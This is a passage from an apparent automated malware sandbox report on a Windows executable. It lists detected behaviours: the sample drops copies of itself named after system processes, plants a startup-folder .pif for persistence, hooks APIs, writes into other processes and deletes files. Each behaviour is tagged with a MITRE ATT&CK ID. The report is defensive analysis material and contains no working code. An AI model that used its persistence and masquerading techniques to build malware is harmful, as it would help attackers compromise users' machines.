4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46820 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00000960]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00000960]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00000960]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00000960]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00000960]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00000960]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00000960]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4B9B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000960]\n \"IEXPLORER.EXE.67EE4669.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000960]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000960]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00000960]\n \"D3_08.EXE.67EE4A8B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE4667.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4A8E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00000960]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00000960]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00000960]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00000960]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00000960]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00000960]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00000960]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00000960]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00000960]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00000960]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000960]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00000960]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00000960]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000960]\n \"D3_08.EXE.67EE4AE3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 30b587bd3c04ca01 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FileTimeToLocalFileTime\" with parameter 729f247361a4db01 & ro (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FileTimeToLocalFileTime\" with parameter 82fe3e8761a4db01 & 82cec74a72a4db01 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FileTimeToLocalFileTime\" with parameter 64e54a8761a4db01 & 64b5d34a72a4db01 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FileTimeToLocalFileTime\" with parameter 75bef98861a4db01 & 758e824c72a4db01 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"FileTimeToLocalFileTime\" with parameter e3616e8961a4db01 & e331f74c72a4db01 (UID: 00000000-00000960)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00000960)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-284", "type": 6, "relevance": 1, "name": "Opens a handle to the specified local process", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opens a process \"C:\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opens a process \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINLOGON.EXE\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opens a process \"C:\\Windows\\System32\\dwm.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opens a process \"C:\\Windows\\explorer.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opens a process \"C:\\Windows\\System32\\taskhost.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opens a process \"C:\\Windows\\System32\\dinotify.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opens a process \"C:\\Windows\\System32\\conhost.exe\" (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opens a process \"C:\\Windows\\D3_08.exe\" (UID: 00000000-00000960)", "origin": "API Call", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"WinExec@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"OpenMutexA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindResourceW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"Process32NextW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateProcessW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateProcessA@KERNEL32.DLL\" in \"IExplorer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" marked \"C:\\share\\D3_08\\New Folder.exe\" for deletion\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\D3_08.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\D3_08.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\D3_08.EXE\" with delete access\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"K:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"L:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"M:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"N:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"O:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"P:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"Q:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"R:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"S:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"T:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"U:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"V:\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" (UID: 00000000-00000960)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005992)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001712)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005496)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005836)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005792)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005588)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005808)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001440)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005760)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004400)\n Spawned process \"D3_08.exe\" (UID: 00000000-00000756)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003332)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000964)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005724)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004188)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004392)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004248)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006052)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004308)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006084)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003580)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004268)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004240)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003616)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003476)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004580)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003456)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001880)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003792)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006056)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004416)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004500)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002728)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001888)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002176)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003648)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004512)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003880)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004104)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003824)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003856)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000272)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003012)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000296)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001708)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002640)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004180)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003812)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004652)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000416)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002784)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002496)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002160)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 52 bytes to a remote process 